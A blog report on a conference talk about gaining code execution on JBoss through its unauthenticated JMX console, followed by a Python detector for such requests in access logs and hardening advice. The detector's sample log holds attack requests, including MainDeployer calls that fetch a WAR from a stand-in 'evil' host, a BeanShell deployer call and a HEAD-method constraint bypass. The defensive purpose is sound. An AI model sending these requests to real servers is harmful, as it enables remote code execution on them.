Last presentation on the schedule: Patrick Hof and Jens Liebchen, from RedTeam Pentesting, presented their work on JBoss and its configuration. The goal was to explain how to exploit a JBoss server and get a shell on it. They got it! JBoss has a complex architecture and is widely used, which means: “widely used + complex structure + used in enterprises = good target”. To get code execution on JBoss, they deployed a WAR file (Web application ARchive). How? Through the JMX console. By default, this console is NOT protected by any authentication! Scary for a product used by so many organisations! Here is a link to the same kind of exploit. Other tools used were twiddle.sh (the JMX command-line client that ships with JBoss) and the BSHDeployer MBean, which runs a BeanShell script on the server. That second one matters: the classic trick asks the MainDeployer MBean to fetch the WAR from a URL, so the server must be able to connect back to the attacker, whereas a BeanShell script can write the WAR straight into the server's own deploy directory without any outbound connection. That is how they demonstrated that even placed behind a firewall, a JBoss server is still vulnerable to code execution.
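To turn this into something a blue team can use, here is an added example of mine (not code from the talk or from RedTeam Pentesting): a small Python detector that reads JBoss access-log lines and flags the JMX-console requests the attack above leaves behind. The log lines are constructed for the example; the /jmx-console/HtmlAdaptor and /invoker/JMXInvokerServlet paths and the MainDeployer/BSHDeployer MBean names are JBoss's real ones; the severity scoring is my own assumption.

```python
"""Spot JMX-console abuse in a JBoss access log.

Added example for this post, not code from the talk. The log lines below are
constructed; the /jmx-console/HtmlAdaptor and /invoker/JMXInvokerServlet paths
and the MBean names are the real JBoss ones. The scoring rules are my own.
"""
import re
from urllib.parse import parse_qs, urlsplit

# MBeans that, once reachable without authentication, hand an attacker code execution.
DEPLOYER_MBEANS = {
    "jboss.system:service=MainDeployer": "MainDeployer invoked (deploys an archive fetched from a URL)",
    "jboss.deployer:service=BSHDeployer": "BSHDeployer invoked (runs a BeanShell script on the server)",
}

# Tomcat/Apache "common" access log: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one host probing the console, plus one attempt a security constraint blocked.
SAMPLE_LOG = """\
10.1.2.3 - - [23/Oct/2009:10:01:12 +0200] "GET /index.html HTTP/1.1" 200 512
10.1.2.3 - - [23/Oct/2009:10:01:40 +0200] "GET /jmx-console/ HTTP/1.1" 200 18322
10.1.2.3 - - [23/Oct/2009:10:02:05 +0200] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=17&arg0=http%3A%2F%2F10.1.2.3%2Fcmd.war HTTP/1.1" 200 1203
10.1.2.3 - - [23/Oct/2009:10:03:19 +0200] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployer%3Aservice%3DBSHDeployer&methodIndex=5&arg0=import+java.io.*%3B HTTP/1.1" 200 0
10.1.2.3 - - [23/Oct/2009:10:04:00 +0200] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 340
10.9.9.9 - - [23/Oct/2009:10:05:00 +0200] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=17&arg0=http%3A%2F%2Fevil%2Fx.war HTTP/1.1" 401 -
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return a finding for one parsed entry, or None when nothing stands out."""
    url = urlsplit(entry["target"])
    query = parse_qs(url.query)  # parse_qs already URL-decodes the values
    finding = {
        "ip": entry["ip"],
        "method": entry["method"],
        "status": entry["status"],
        "mbean": None,
        "args": [],
        # 401/403 means the container's security constraint did its job this time.
        "blocked": entry["status"] in (401, 403),
    }
    if url.path.startswith("/invoker/JMXInvokerServlet"):
        finding.update(severity="high", reason="JMX invoker servlet reached over HTTP")
        return finding
    if not url.path.startswith("/jmx-console"):
        return None
    action = query.get("action", [""])[0]
    mbean = query.get("name", [""])[0]
    finding["mbean"] = mbean or None
    if action != "invokeOp":
        finding.update(severity="low", reason="JMX console browsed")
        return finding
    # Operation arguments arrive as arg0, arg1, ...; keep them, they name the payload.
    finding["args"] = [query[k][0] for k in sorted(query) if k.startswith("arg")]
    if mbean in DEPLOYER_MBEANS:
        finding.update(severity="critical", reason=DEPLOYER_MBEANS[mbean])
    else:
        finding.update(severity="medium", reason="invokeOp on " + mbean)
    if entry["method"] not in ("GET", "POST"):
        # A <security-constraint> that lists only GET and POST leaves every other
        # method uncovered, so an invokeOp sent with HEAD is a deliberate bypass attempt.
        finding["reason"] += "; sent with %s, outside a GET/POST-only constraint" % entry["method"]
    return finding


def scan(log_text):
    """Run every line of the log through the classifier and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            finding = classify(entry)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "BLOCKED " if f["blocked"] else ""
        print(f"[{f['severity']:8}] {flag}{f['ip']} {f['method']} {f['status']} {f['reason']} {f['args']}")
```

Run it as is to see the sample scored, or feed `scan()` the content of a real server access log. The interesting hits are the critical ones with `blocked` false: a deployer MBean invoked from the console and answered with a 200, which is exactly the request that plants the attacker's WAR. A critical finding with a non-GET/POST method tells you your security constraint exists but was written for only two methods.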
Conclusions? Once again, internal security is required! Most companies think they are protected by their [firewall|ids|ips|reverse-proxies|…] but what about internal threats? And finally, do NOT run any software with an out-of-the-box configuration. Review the security settings and fix them according to your security policy! For JBoss, that means at least enabling the security constraint that ships commented out in the jmx-console web.xml, giving the console a security domain and replacing the default admin credentials; and remember that a constraint listing only GET and POST leaves every other HTTP method open, so cover all methods.
That’s all for today! See you tomorrow for more presentations!